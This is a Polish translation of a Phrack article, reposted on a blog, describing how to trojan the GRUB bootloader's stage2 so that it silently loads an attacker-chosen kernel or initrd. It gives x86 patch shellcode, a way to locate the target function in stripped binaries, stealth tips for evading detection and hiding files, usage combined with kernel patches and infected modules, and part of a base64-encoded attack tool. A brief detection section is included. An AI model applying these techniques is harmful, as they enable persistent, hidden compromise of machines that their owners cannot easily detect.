wtorek, 2 lipca 2013

Phrack nr 63 - "Hakowanie Gruba dla zabawy i zysku"

                ==Phrack Inc.=              
         Tom 0x0b, Wydanie 0x3f, Plik #0x0a z 0x14

|=-----------------=[ Hakowanie Gruba dla zabawy i zysku ]=---------------=|
|=--------------------------------------------------------------------------=|
|=----------------=[ CoolQ <qufuping@ercist.iscas.ac.cn> ]=---------------=|
|=-----------------------------------------------------------------------=|

--[ Spis treści

  0.0 - Przegląd trojanów, backdoorów i rootkitów
  
  1.0 - Proces bootowania z Grubem
    1.1 Jak Grub pracuje?
    1.2 stage1
    1.3 stage1.5 i stage2
    1.4 Grub util
    
  2.0 - Możliwość załadowania określonego pliku
  
  3.0 - Techniki hakowania
    3.1 Jak załadować file_fake
    3.2 Jak zlokalizować ext2fs_dir
    3.3 Jak zhakować Gruba
    3.4 Jak zrobić coś podstępnego
    
  4.0 - Użycie
  
  5.0 - Wykrywanie
  
  6.0 - Na koniec
  
  7.0 - Informacje
  
  8.0 - hack_grub.tar.gz

--[ 0.0 - Przegląd trojanów, backdoorów i rootkitów
Od 1989, kiedy pojawiło sie pierwsze narzędzie do edytowania logów, (Phrack
0x19 #6 - Hiding out under Unix), trojany, backdoory i rootkity zaczęły
silnie ewoluować. Z wczesnych narzedzi trybu użytkownika jak LRK4/5, do
trybu jądra w rodzaju knark/adore/adore-ng, wtedy pojawił się SuckIT,
implementowany jako moduł, obecnie nawet statyczna łata na jądro.
 Ostrożnie obmyślona, więc co pozostało nietknięte? Tak, to boot-loader. 
 Więc w tym artykule, zaprezentuję drogę do załadowania Gruba z Twoimi
opcjami, tzn. można załadować każde jądro/initrd, obraz/grub.conf, pomijając
plik który określiłeś w grub.conf.

P.S.: Ten artykuł jest napisany w oparciu o system Linux z ext2/3 na
platformę x86.

--[ 1.0 - Proces bootowania z Grubem

----[ 1.1 - Jak Grub pracuje?            +-----------------------+
            | bootowanie, ładowanie |
            |     MBR     |
            +------------+----------+
                  |
           +----------------+   Nie
           | Grub jest w MBR +------->-------+
           +-------+--------+        | 
            Tak  | stage1    +-------+----------+
        Tak +--------+---------+   | skok do aktywnej |
       +--<---+ stage1.5 config |   |  partycji    |
        |  +--------+---------+   +--------+---------+
        |     Nie |           |
   +-------+-------------+|   |  +-----+-----------+  
   | ładowanie osadzonych | stage1-> | ładowanie boot- | 
   |   sektorów    |    | |  -sektora   |
   +-------+--------------+  V   +-----+-----------+
      ^  |        |    + - - - < - - - + Cf 1.3
      |  |        |          +------+---------+
    stage1.5 +-------->------+--------->-------+ ładowanie stage2 +
                          +------+---------+
                              |
                  +---------------<--------+
                  V
                 +------------+-----------+
                 |  ładowanie grub.conf |
                 | wyświetlanie boot-menu |
                 +-----------+-----------+
                    | interakcja z użytkownikiem
                    +---------+---------------+
                    | ładowanie obrazu jądra |
                    |   i bootowanie    |
                    +------------------------+                    
--[ 1.2 - stage1

 stage1 ma 512 bajtów, a jego kod źródłowy możesz obejrzeć w
stage1/stage1.S. Jest zainstalowany w MBR lub w boot-sektorze głównej
partycji. Zadanie jest proste - załaduj określony sektor (zdefiniowany w
stage2_sector) do określonego adresu (zdefiniowany w
stage2_address/stage2_segment). Jeśli stage1.5 jest skonfigurowany, pierwszy
sektor stage1.5 jest ładowany do adresu 0200:000; jeśli nie, pierwszy sektor
stage2 jest ładowany do adresu 0800:0000.

----[ 1.3 - stage1.5 i stage2

 Wiemy że Grub jest loaderem wrażliwych systemów plików, tzn. Grub może
zrozumieć i czytać pliki z różnych systemów plików, bez pomocy systemu
operacyjnego. Ale jak? Sekret tkwi w stage1.5 i stage2. Spójrzmy na
/boot/grub, znajdziesz tam następujace pliki:
stage1, stage2, e2fs_stage1_5, fat_stage1_5, ffs_stage1_5, minix_stage1_5,
reiserfs_stage1_5, ...
Mamy wymienione stage1 w stage1.2, plik stage1 zostanie zainstalowany w MBR
lub w innym boot-sektorze. Więc nawet jeśli plik stage1 zostałby usunięty,
system zbootuje sie nienaruszony.
 Co z zerowaniem plików stage2 i *_stage1_5? Czy system może nadal bootować?
Odpowiedź brzmi 'nie' dla kwestii zerowania i 'tak' dla bootowania. Jesteś
zaskoczony tą odpowiedzią? Wiec kontynuuj czytanie...

 Zobaczmy jak *_stage1_5 i stage2 są generowane:
 
-------------------------------- POCZĄTEK -----------------------------------
e2fs_stage1_5:
gcc -o e2fs_stage1_5.exec -nostdlib -Wl,-N -Wl,-Ttext -Wl,2000
  e2fs_stage1_5_exec-start.o e2fs_stage1_5_exec-asm.o
  e2fs_stage1_5_exec-common.o e2fs_stage1_5_exec-char_io.o
  e2fs_stage1_5_exec-disk_io.o e2fs_stage1_5_exec-stage1_5.o
  e2fs_stage1_5_exec-fsys_ext2fs.o e2fs_stage1_5_exec-bios.o 
  objcopy -O binary e2fs_stage1_5.exec e2fs_stage1_5
      
stage2:
gcc -o pre_stage2.exec -nostdlib -Wl,-N -Wl,-Ttext -Wl,8200
  pre_stage2_exec-asm.o pre_stage2_exec-bios.o pre_stage2_exec-boot.o
  pre_stage2_exec-builtins.o pre_stage2_exec-common.o
  pre_stage2_exec-char_io.o pre_stage2_exec-cmdline.o
  pre_stage2_exec-disk_io.o pre_stage2_exec-gunzip.o
  pre_stage2_exec-fsys_ext2fs.o pre_stage2_exec-fsys_fat.o
  pre_stage2_exec-fsys_ffs.o pre_stage2_exec-fsys_minix.o
  pre_stage2_exec-fsys_reiserfs.o pre_stage2_exec-fsys_vstafs.o
  pre_stage2_exec-hercules.o pre_stage2_exec-serial.o
  pre_stage2_exec-smp-imps.o pre_stage2_exec-stage2.o
  pre_stage2_exec-md5.o
  objcopy -O binary pre_stage2.exec pre_stage2
  cat start pre_stage2 > stage2
--------------------------------- KONIEC ------------------------------------

 Zgodnie z powyższym, powinno to wyglądać tak:
 
 e2fs_stage1_5:
  [start.S] [asm.S] [common.c] [char_io.c] [disk_io.c] [stage1_5.c]
  [fsys_ext2fs.c] [bios.c]
 stage2:
  [start.S] [asm.S] [bios.c] [boot.c] [builtins.c] [common.c] [char_io.c]
  [cmdline.c] [disk_io.c] [gunzip.c] [fsys_ext2fs.c] [fsys_fat.c]
  [fsys_ffs.c] [fsys_minix.c] [fsys_reiserfs.c] [fsys_vstafs.c]
  [hercules.c] [serial.c] [smp-imps.c] [stage2.c] [md5.c]

 Widzimy że e2fs_stage1_5 i stage2 są podobne. Ale e2fs_stage1 jest
mniejszy i zawiera zasadnicze moduły (wejście i wyjście dysku, obsługa
łancuchów, inicjalizacja systemu, obsługa systemu plików ext2/3), dopóki
stage2 jest wszystko-w-jednym, dopóty zawiera wszystkie moduły systemów
plików, wyświetlanie, szyfrowanie, etc.

 start.S jest bardzo ważny dla Gruba, stage1 załaduje start.S do 0200:0000
(jeśli stage1_5 jest skonfigurowany) lub 0800:0000 (jeśli nie), wtedy skoczy
do tego adresu. Zadanie start.S jest bardzo proste (tylko 512 bajtów),
ładuje on resztę czśści stage1_5 lub stage2 do pamięci. Pytaniem jest, skoro
system plików powiązał kod nie mogąc go załadować, to skąd Grub zna
lokalizację reszty sektorów? start.S ma pewniem trik:

-------------------------------- POCZĄTEK -----------------------------------
blocklist_default_start:
     .long 2 /* to jest paramentr startowy sektora, w logicznym
           sektorze ze startu dysku, sektor 0 */
blocklist_default_len: /* to jest liczba sektorów do czytania */
#ifdef STAGE1_5
     .word 0 /* komenda "install" dokona zapełnienia */
#else
     .word (STAGE2_SIZE + 511) >> 9
#endif
blocklist_default_seg:
#ifdef STAGE1_5
     .word 0x220
#else
     .word 0x820 /* to jest segment adresu rozpoczynającego
             ładowanie danych */
#endif
firstlist: /* to jest etykieta która musi być po liście danych!!! */
--------------------------------- KONIEC ------------------------------------

 Na przykład:
# hexdump -x -n 512 /boot/grub/stage2
...
00001d0 [ 0000  0000  0000  0000 ][ 0000  0000  0000  0000 ]
00001e0 [ 62c7  0026  0064  1600 ][ 62af  0026  0010  1400 ]
00001f0 [ 6287  0026  0020  1000 ][ 61d0  0026  003f  0820 ]

 Powinniśmy to rozumieć (na wspak) jako: załaduj sektor 0x3f (start z
No.0x2661d0) 
do 0x0820:0000, załaduj sektor 0x20 (start z No.0x266287) do 0x1000:0000,
załaduj sektor 0x10 (start z No.0x2662af) do 0x1400:00, załaduj sektor 0x64
(start z No.0x2662c7) do 0x1600:0000. 
 W mojej dystrybucji, stage2 ma 0xd4(1+0x3f+0x20+0x10+0x64) sektorów,
rozmiar pliku wynosi 108328 bajtów, dwie pary (rozmiar sektora ma 512).

 Kiedy start.S zakończy uruchamianie, stage1_5 i stage2 są w pełni
załadowane, start.S skacze do asm.S i kontunuuje wykonywanie. 

 Wciąż pozostaje problem, kiedy stage1.5 jest konfigurowany? Faktycznie,
stage1.5 nie jest potrzebny. Ma zadanie załadować /boot/grub/stage2 do
pamięci. Ale zwraca uwagę na to że stage1.5 używa systemu plików do
załadowanie pliku stage2: 
Krzywo zanalizowane ale... pobiera inode stage2, potem blok-listę stage2.
Więc jeśli stage1.5 jest skonfigurowany to stage2 jest ładowany przez system
plików; jesli nie, stage2 jest ładowany przez stage2_sector w stage1 i listę 
sektorów w start.S stage2.
 Żeby pokazać to w czystszej postaci, przedstawię nastepujący scenariusz:
(ext2/ext3)
# mv /boot/grub/stage2 /boot/grub/stage2.bak
Jeśli stage1.5 jest skonfigurowany, bootowanie zawiedzie, stage1.5 nie może
znaleźć /boot/grub/stage2 w systemie plików. Ale jeśli stage1.5 nie jest
skonfigurowany, bootowanie powiedzie się! Jest tak ponieważ mv nie może
zmienić fizycznego wyglądu stage2, wiec stage2_sector pozostaje ten sam,
lista sektorów w stage2 także.

 Teraz, stage1 (-> stage1.5) -> stage2. Wszystko jest na pozycji. asm.S
przełączy się na tryb chroniony, otwiera /boot/grub/grub.conf (lub
menu.lst), pobiera konfigurację, wyświetla menu, i czeka na polecenia od
użytkownika. Po wyborze jądra przez użytkownika, Grub ładuje odpowiedni
jego obraz (czasami także obraz ram-dysku), i bootuje jądro.

----[ 1.4 - Grub util

 Jeżeli Grub został nadpisany przez Windows, mozez użyc Grub util do
ponownej instalacji Gruba. 

# grub
---
grub > find /grub/stage2 <- jeżeli masz boot-partycje 
lub
grub > find /boot/grub/stage2 <- jeżeli nie masz boot-partycji
---
(hd0,0) <= rezultat 'find'
grub > root (hd0,0) <- ustawienie głównego katalogu boot-partycji
---
grub > setup (hd0) <- jeśli chcesz zainstalować Gruba w MBR
lub
grub > setup (hd0,0) <- jeśli chcesz zainstalować Gruba w boot-sektorze
---             
Sprawdzam czy "/boot/grub/stage1" istnieje... tak
Sprawdzam czy "/boot/grub/stage2" istnieje... tak
Sprawdzam czy "/boot/grub/e2fs_stage1_t" istnieje... tak
Uruchamiam "embed /boot/grub/e2fs_stage1_5 (hd0)"... 22
Sektory zostały umieszczone pomyślnie. <= jeżeli zainstalowałeś Gruba w
                      boot-sektorze, to zawiedzie
Uruchamianie "install /boot/grub/stage1 d (hd0) (hd0)1+22 p (hd0,0) 
/boot/grub/stage2 /boot/grub/grub.conf"... pomyślne
Ukonczono

 Możliwe że zobaczymy próby umieszczenia stage1.5 przez Gruba. Jeżeli Grub
jest zainstalowany w MBR, stage1.5 jest lokowany po MBR, rozmiar 22
sektorów. Jeśli Grub jest zainstalowany w boot-sektorze, nie ma
dostatecznego miejsca na umieszczenie stage1.5 (superblok ma offset 0x400
dla partycji ext2/ext3, tylko 0x200 dla stage1.5), więc komenda 'embed'
zawiedzie. 

 Aby dowiedzieć się więcej zajżyj do manuala Gruba i kodu źródłowego.

--[ 2.0 - Możliwość załadowania określonego pliku

 Grub ma swój własny mini system plików dla ext2/ext3. System ten używa
grub_open(), grub_read() i grub_close() do otwierania, czytania oraz
zamykania plików. Teraz spojrzyj na ext2fs_dir:

/* warunki początkowe: ext2fs_mount jest już wykonane, więc superblok w 
 * buforze znany jest jako SUPERBLOCK 
 * wartości zwracane: 0 po błędzie, wartość niezerowa jeżeli poszukiwanie
 * pliku zakonczyło się pomyślnie
 * warunki końcowe: jeżeli została zwrócona wartość niezerowa, bufor znany
 * jest jako INODE, zawiera inode pliku którego probowaliśmy szukać
 * efekty uboczne: zaśmieca przestrzeń bufora GROUP_DESC
 */
int ext2fs_dir (char *dirname) {
 int current_ino = EXT2_ROOT_INO; /* start przy głównym katalogu */
 int updir_ino = current_ino; /* źródło aktualnego katalogu */
 ...
}

 Przypuszczalnie linia w grub.conf wygląda tak: 
kernel=/boot/vmlinuz-2.6.11 ro root=/dev/hda1
grub_open wywołuje ext2fs_dir("/boot/vmlinuz-2.6.11 ro root=/dev/hda1"),
ext2fs_dir zostawia informacje o inode w INODE, wtedy grub_read może użyć
INODE do pobrania danych z każdego offsetu (mapa znajduje się w
INODE->i_blocks[] dla bezpośrednich bloków).

 Wewnątrz ext2fs_dir znajduje się:
1. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
  ^ inode = EXT2_ROOT_INO, zostawia informacje o inode w INODE;
2. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
  ^ znajdź dentry w '/', zostawia informacje o inode '/boot' w INODE;
3. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
  ^ znajdź dentry w '/boot', zostawia informacje o inode
  '/boot/vmlinuz-2.6.11' w INODE ;
4. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
  ^ wskaźnikiem jest spacja, INODE jest regularnym plikiem, zwraca 1 po
  sukcesie, INDOE zawiera informacje o '/boot/vmlinuz-2.6.11'.
  
 Jeżeli pasożytujemy ten kod, i zwraca on informacje o inode file_fake, Grub
szczęśliwie załaduje file_fake wobec tego jako /boot/vmlinuz-2.6.11.

 Mozemy zrobić to:
1. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
  ^ inode = EXT2_ROOT_INO;
2. boot/vmlinuz-2.6.11 ro root=/dev/hda1
  ^ zmień to na 0x0, zmień EXT2_ROOT_INO na inode file_fake;
3. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
  ^ EXT2_ROOT_INO(file_fake) informacja jest w INODE, wskaźnikiem jest 0x0,
  INODE jest regularnym plikiem, zwraca 1.
  
 Ponieważ zmieniliśmy argument ext2fs_dir, mogą pojawić się efekty uboczne?
Nie zapominaj o drugiej części "ro root=/dev/hda1", to jest parametr
podawany do jądra. Bez niego jądro nie będzie się bootowało poprawnie. 
(P.S.: Tylko "cat/proc/cmdline" widzi parametr jaki ma twoje jądro.)
 Więc zobaczmy wnętrze "kernel=...", procesu kernel_func, linie "kernel=...":

static int
kernel_func (char *arg, int flags)
{
 ...
 /* Kopiuje linie komend do MB_CMDLINE */
 grub_memmove(mb_cmdline, arg, len + 1);
 kernel_type = load_image(arg, mb_cmdline, suggested_type, load_flags);
 ...
}

 Widzisz? arg i mb_cmdline ma dwie kopie łańcucha "/boot/vmlinuz-2.6.11 ro
root=/dev/hda1" (nie ma tu zakładki, więc właściwie grub_memmove jest taka
sama jak grub_memcpy). W load_image możesz znaleźć arg i mb_cmdline nie
zmieszane ze sobą. Wniosek z tego taki ze NIE MA efektów ubocznych. Jeżeli
nie wierzysz, możesz dodać trochę kodu pobierającego rzeczy z powrotem.

--[ 3.0 - Techniki hakowania

 Techniki hakowania powinny generalnie działać na wszystkich wersjach Gruba
(wyłączajćc grub-ng) ze wszystkimi dystrybucjami Linuksa.

----[ 3.1 - Jak załadować file_fake

 Możemy dodać skok przy rozpoczęciu ext2fs_dir, potem zmieniamy pierwszy znak
argumentu ext2fs_dir na 0, zmieniamy "current_ino = EXT2_ROOT_INO" na
"current_ino = INODE_OF_FAKE_FILE", następnie skaczemy do tyłu. 
 Uwaga: Tylko gdy spełniony jest pewien warunek możesz załadować file_fake.
Np.: Kiedy system chce otworzyć /boot/vmlinuz-2.6.11, wtedy zwracany jest 
/boot/file_fake; dopóki system chce /boot/grub/grub.conf, poprawny plik
powinien być zwracany. Jeśli kody nadal zwracają /boot/file_fake, ups, brak
wyświetlonego menu. 
 Skok jest prosty. Ale jak zmienić "current_ino = INODE_OF_FAKE_FILE"? 
int ext2fs_dir (char *dirname) {
 int current_ino = EXT2_ROOT_INO; /* start przy głównym katalogu */
 int updir_ino = current_ino; /* zrodlo aktualnego katalogu */
...

 EXT2_ROOT_INO wynosi 2, wiec current_ino i updir_ino są inicjowane na 2.
Odpowiedni kod w asemblerze powinien wyglądać jak "movl $2,
0xffffXXXX($esp)". Ale miej na uwadze optymizacje: current_ino i updir_ino
jest przydzielana liczba 2, optymalnym rezulatatem może być "movl $2,
0xffffXXXX($esp)" i "movl $2, 0xffffYYYY($esp)", lub "movl $2, %reg", potem
"movl %reg, 0xffffXXXX($esp)" "movl %reg, 0xffffYYYY($esp)", lub więcej
wariantów. Typem jest int, wartością jest 2, więc możliwość "xor %eax, %eax;
inc %eax; inc %eax" jest niska, to jest to samo co "xor %eax, %eax; movb
$0x2, %al". To czego musimy to szukać 0x00000002 od ext2fs_dir do ext2fs_dir +
dno (np.: 100 bajtow), wtedy zmieniamy 0x00000002 na INODE_OF_FAKE_FILE.

static char ext2_embed_code[] = {
  0x60, /* pusha*/
  0x9c, /* pushf*/
  0xeb, 0x28, /* jmp 4f*/
  0x5f, /* 1: pop %edi*/
  0x8b, 0xf, /* movl (%edi), %ecx*/
  0x8b, 0x74, 0x24, 0x28, /* movl 40(%esp), %esi*/
  0x83, 0xc7, 0x4, /* addl $4, %edi*/
  0xf3, 0xa6, /* repz cmpsb %es:(%edi), %ds:(%esi)*/
  0x83, 0xf9, 0x0, /* cmp $0, %ecx*/
  0x74, 0x2, /* je 2f*/
  0xeb, 0xe, /* jmp 3f*/
  0x8b, 0x74, 0x24, 0x28, /* 2: movl 40(%esp), %esi*/
  0xc6, 0x6, 0x00, /* movb $0x0, (%esi) '\0' */
  0x9d, /* popf*/
  0x61, /* popa*/
  0xe9, 0x0, 0x0, 0x0, 0x0, /* jmp change_inode*/
  0x9d, /* 3: popf*/
  0x61, /* popa*/
  0xe9, 0x0, 0x0, 0x0, 0x0, /* jmp not_change_inode*/
  0xe8, 0xd3, 0xff, 0xff, 0xff, /* 4: call 1b*/

  0x0, 0x0, 0x0, 0x0, /* dlugość plikowej nazwy jądra */
  0x0, 0x0, 0x0, 0x0, 0x0, 0x0, /* łancuch nazwy pliku, 48B wszędzie */
  0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
  0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
  0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
  0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
  0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
  0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
  0x0, 0x0, 0x0, 0x0, 0x0, 0x0
};

memcpy(buf_embed, ext2_embed_code, sizeof(ext2_embed_code));
Oczywiście możesz napisać swój własny algorytm łancucha porównawczego.

/* Umieszczony kod, druga część, change_inode */
memcpy(buf_embed + sizeof(ext2_embed_code), s_start, s_mov_end - s_start);
modify_EXT2_ROOT_INO_to_INODE_OF_FAKE_FILE();

/* Umieszczony kod, trzecia część, not_change_inode */
memcpy(buf_embed + sizeof(ext2_embed_code) + (s_mov_end - s_start) + 5, 
s_start, s_mov_end - s_start);

 W rezultacie wygląda to tak:
 
 ext2fs_dir:                  not_change_inode:
  +------------------------+    +--------> +------------------------+
  | push %esp <= jmp embed |    |     | push %esp       |
  | mov %esp, %ebp     |    |     | mov %esp, %ebp     |
  | push %edi       |    |     | push %edi       |
  | push %esi       +--------<     | push %esi       |
  | sub $0x42c, %esp    |    |     | sub $0x42c, %esp    |
  | mov $2, fffffbe4(%esp) |    |     | mov $2, fffffbe4(%esp) |
  | mov $2, fffffbe0(%esp) |    |     | mov $2, fffffbe0(%esp) |
  |back:          |    |     | jmp back        |
  +------------------------+    |     +------------------------+
  embed:              +--------> change_inode:
  +------------------------+          +------------------------+
  | zachowaj rejestry   |          | push %esp       |
  | porównaj lancuchy   |          | mov %esp, %ebp     | 
  | jeżeli pasują, goto 1 |          | push %edi       |
  | jeżeli nie, goto 2   |          | push %esi       |
  |            |          |            |
  | 1: odtwórz rejestry  |          | sub $0x42c, %esp    |
  | jmp change_inode    |  INODE_OF_  -> | mov $?, fffffbe4(%esp) |
  | 2: odtwórz rejestry  |  FAKE_FILE  -> | mov $?, fffffbe0(%esp) |
  | jmp not_change_inode  |          | jmp back        |
  |            |          +------------------------+
  +------------------------+        

----[ 3.2 - Jak zlokalizować ext2fs_dir

 To jest trudna część. stage2 jest generowany przez objcopy, więc wszystkie
ELF informacje są usunięte - ŻADNYCH TABELI SYMBOLI! Musimy znaleźć jakieś
PATTERN-y żeby zlokalizować ext2fs_dir.

 Pierwszym wyborem jest log2:
#define long2(n) ffz(~(n))
static __inline__ unsigned long ffz (unsigned long word) {
  __asm__ ("bsfl %1, %0" :"=r" (word) :"r" (~word));
  return word;
}
group_desc = group_id >> log2(EXT2_DESC_PER_BLOCK (SUPERBLOCK));

 Pytaniem jest, czy ffz jest deklarowany jako __inline__, który wskazuje czy
MOŻE ta funkcja jest deklarowana jako __inline__, czy MOŻE nie. Więc dajemy
sobie spokój. 

 Następnym wyborem jest SUPERBLOCK->s_inodes_per_group w
group_id = (current_ino - 1) / (SUPERBLOCK->s_inodes_per_group);
#define RAW_ADDR(x) (x)
#define FSYS_BUF RAW_ADDR(0x68000)
#define SUPERBLOCK ((struct ext2_super_block *)(FSYS_BUF))
struct ext2_super_block {
  ...
  __u32 s_inodes_per_group; /* # Inodes per group */
  ...
}

 Wtedy obliczamy że SUPERBLOCK->s_inodes_per_group wynosi 0x68028. Ten adres
znajduje się tylko w in ext2fs_dir, więc prawdopodobieństwo kolizji jest
niewielkie. Po zlokalizowaniu 0x68028, wracamy z powrotem pobrać start
ext2fs_dir. Nasuwa się następne pytanie, jak zidentyfikować start
ext2fs_dir? Oczywiście możesz z powrotem poszukać 0xc3. Ale co jeśli to jest
tylko część instrukcji w rodzaju operandów? Czasami także gcc dodaje jakiś
lipny kod do poprawiania adresu funkcji (4 bajty/8 bajtów/16bajtow), jak 
wtedy pominąć ten lipny kod? Tylko listą wszystkich kombinacji? 
 Ta metoda jest praktyczna ale nie idealna.
 
 Teraz zauważona fsys_table:
struct fsys_entry fsys_table[NUM_FSYS + 1] {
...
# ifdef FSYS_FAT
{"fat", fat_mount, fat_read, fat_dir, 0, 0},
# endif
# ifdef FSYS_EXT2FS
{"ext2fs", ext2fs_mount, ext2fs_read, ext2fs_dir, 0, 0},
# endif
# ifdef FSYS_MINIX
{"minix", minix_mount, minix_read, minix_dir, 0, 0},
# endif
...
};

 fsync_table jest wywoływana jak to:
if ((*(fsys_table[fsys_type].mount_func)) () != 1)

 Więc naszym trikiem jest:
1. Znaleźć stage2 dla łańcucha "ext2fs", pobrać jego offset, następnie
  przekonwertować offset do adresu pamięci (stage2 startuje z 0800:0000) 
  addr_1.
2. Znaleźć stage2 dla addr_1, pobrać jego offset, następnie pobrać kolejnych
  5 liczb całkowitych, (A, B, C, D, E), A<B ? B<C ? C<addr_1 ? D==0 ? E==0?
  Jeśli jakaś jest "No", goto 1 i kontunuuj poszukiwania.
3. Dalej C jest adresem pamięci ext2fs_dir, przekonwertuj to do offsetu pliku.
  Dobrze, to wszystko.

----[ 3.3 - Jak zhakować Gruba

 Dobrze, więc z pomoca punktów 3.1 i 3.2, możemy zhakować Gruba bardzo
prosto. Pierwszym celem jest stage2. Możemy pobrać adres startowy
ext2fs_dir, dodać gdzies JMP, następnie kopiujemy zamieszczony kod. Ale
gdzie jest 'gdzieś'? Oczywiście koncówka stage2 nie jest doskonała, to
zmieni rozmiar pliku. Możemy wybrać minix_dir jako nasz cel. Co z fat_mount?
Naprawdę jest za ext2fs_dir. Ale odpowiedź brzmi NIE! Zobacz na "root ..."

root_func()->open_device()->attemp_mount()
for (fsys_type = 0; fsys_type < NUM_FSYS 
&& (*(fsys_table[fsys_type].mount_func)) () != 1; fsys_type++);

Zobacz na fsys_table, fat jest przed ext2, więc najpierw jest wywoływane
fat_mount. Jeśli fat_mount jest modyfikowane, dobrze znać rezultat. Do
zrobienia tego bezpiecznie, wybieżemy minix_dir.

 Teraz twój stage2 może załadowac file_fake. Rozmiar pozostaje ten sam ale
wartość hashu zmienia się.

----[ 3.4 - Jak zrobić coś podstępnego

 Dlaczego musimy użyć /boot/grub/stage2? Możemy otrzymać skok stage1 do
stage2_fake (cp stage2 stage2_fake, modyfikacja stage2_fake), więc stage2
pozostaje nienaruszony. 
 Jeżeli skopiujesz stage2 do stage2_fake, stage2_fake nie będzie chciał
pracować. Pamiętasz listy sektorów w start.S? Musisz zmienić listy na
stage2_fake, nie oryginalny stage2. Możesz przywrócić inode, pobrać
i_block[], wtedy są tam block-listy (nie zapomnij dodać offset partycji).
Musisz omijać VPN do pobrania informacji o inode, zobacz [1].
 Odkąd używasz stage2_fake, odpowiedni adres w stage1 powinien być
modyfikowany. Jeżeli stage1.5 nie jest zainstalowany, to proste, zmień tylko
stage2_sector z stage2_orig na stage2_fake (MBR jest zmieniony). Jeśli
stage1.5 jest zainstalowany a ty jesteś leniwy i odważny, możesz pominąć
stage1.5 - modyfikując stage2_address, stage2_sector, stage2_segment stage1.
To jest ryzykowne ponieważ:
1) Jeżeli opcja "virus detection" w BIOS-ie jest włączona, modyfikacja MBR
  zostanie wykryta
2) "Grub stage1.5" i "Grub loading, please wait" zostanie zmienione na "Grub
  stage2". To jest błyskotliwe, możesz to zauważyć na swoim SZYBKIM PC?
  
 Jeżeli chcesz być podstępny, możesz zhakować stage1.5 używając podobnych
technik do tych stosowanych w punktach 3.1 i 3.2. Nie zapomnij zmienić listy
sektorów stage1.5 (start.S). Możesz dodać swój zamieszczony kod na końcu.
 Możesz zrobić więcej podstępnych rzeczy: ukryć stage2_fake/kernel_fake od
FS, przenieść inode_of_stage2 do inode_from_1_to_10. Zobacz [2]. 

--[ 4.0 - Użycie

 W połączeniu z innymi technikami widzisz jak potężny jest nasz hack_grub. 
Notatka: wszystkie pliki powinny być umieszczone na tej samej
partycji! 
1) Kombinacja ze statyczną łatą na jądro
  a) cp kernel.orig kernel.fake
  b) statyczna łata na jądro z kernel.fake[3]
  c) cp stage2 stage2.fake
  d) hack_grub stage2.fake kernel.orig inode_of_kernel.fake
2) Kombinacja z ładowalnym modułem
  a) cp initrd.img.orig initrd.img.fake
  b) do ładowalnego modułu z initrd.img.fake, e.g. ext3.[k]o [4]
  c) cp stage2 stage2.fake
  d) hack_grub stage2.fake initrd.img inode_of_initrd.img.fake
  e) ukrycie initrd.img.fake i stage2.fake (opcjonalne)

--[ 5.0 - Wykrywanie

1) Rzuć okiem na MBR i kolejne 63 sektory, a także na główne boot-sektory.
2) Jeżeli nie 1,
  a) jeśli stage1.5 jest skonfigurowany, porównaj sektory od 3 (pełny adres,
   MBR jest sektorem No. 1) z /boot/grub/e2fs_stage1_5
  b) jeśli stage1.5 nie jest skonfigurowany, sprawdź czy stage2_sector
   wskazuje na prawdziwy plik /boot/grub/stage2
3) Sprawdź poprawność pliku e2fs_stage1_5 i stage2
4) Jeśli nie 3 (Hej, jesteś wykwalifikowanym administratorem?)
  a) jeżeli nie ufasz jądru, wyrzuć je i zrób bajt-do-bajta z jądrem na
   dysku. Zobacz [5] po więcej informacji.
  b) jeżeli nie ufasz modułowi, to trudne wyzwanie, może mógłbyś go
   wyrzucić i zdisasemblować?

--[ 6.0 - Na koniec

 LILO jest innym boot-loaderem, ale jest niewrażliwy na system plików. Więc
nie musi być w niego wbudowany. LILO polega na /boot/bootsect.b i
/boot/map.b. Więc jeśli jesteś leniwy, napisz fałszywy lilo.conf, który
wyświetla a.img ale ładuje b.img. Albo możesz załadować przez LILO
/boot/map.b.fake. Szczegóły zostawiam Tobie. Do dzieła!

 Podziękowania dla madsys i grip2 za pomoc w rozwiązywaniu trudnych
problemów; podziękowania dla airsupply i dla innych ludzi za przykłady
stage2 (Red Hat 7.2/9/as3, Fedora Core 2, Gentoo, Debian i Ubuntu), dzięki
dla zhtq za niektóre komentarze na temat pisania artykułów.--[ 7.0 - Informacje

[1] Wygląd i implementacja Second Extended Filesystem (e2fs)
  http://e2fsprogs.sourceforge.net/ext2intro.html
[2] Sposoby ukrywania plików w systemie ext2/3 (chiński)
  http://www.linuxforum.net/forum/gshowflat.php?Cat=&Board=security&
Number=545342&page=0&view=collapsed&sb=5&o=all&vc=1 
[3] Statyczne patchowanie Kernela
  http://www.phrack.org/show.php?p=60&a=8
[4] Infekowanie ładowalnych modułów Kernela
  http://www.phrack.org/show.php?p=61&a=10
[5] Sposoby wyszukiwania rootkitów w Kernelu 2.6 (chiński)
  http://www.linuxforum.net/forum/gshowflat.php?Cat=&Board=security&
Number=540646&page=0&view=collapsed&sb=5&o=all&vc=1--[ 8 - hack_grub.tar.gz

begin-base64 644 hack_grub.tar.gz
H4sIADW+x0IAA+19a49kSXZQ7i6wZK1tbEAyHxCKqZnuyczKqsrMenRN5XTv
VldXz9ZOd1W7q3p27J7m7q3Mm1V3Ol99b2Z318w2QgjxwQghIRkLI9viAxL8
AAsjf0D4i5EQ4iGwxCf8AYOQEDIICRAW5jzieR+ZWdWvWW1edXTlvffEiRMn
Tpw4EXHi3DO/9dg7jcYnq4XXdtVq67VrGxvwl67kX/pdrzU269fWrtXWrxVq
9fpGfb0gNl4fSeYaxyM/EqIQDQajSXDT3v+IXme6/YPno5XWaymjVq/VNtfX
c9p/7dp6fdNq/02Ab6xvXiuI2muhJnH9mLf/u2G/1R23A/FhPGqHg5WzGwvO
o254knh2Hq+OzodBjI/N80UUn7NF68F4FHZjfLQAHB6FLRGPonFrJIZ+NPLC
fmcgihX92+uG8UhcFwcP7txpJjIA5gYADdpBEf73TsYdDTHux+FpP2iLsD8q
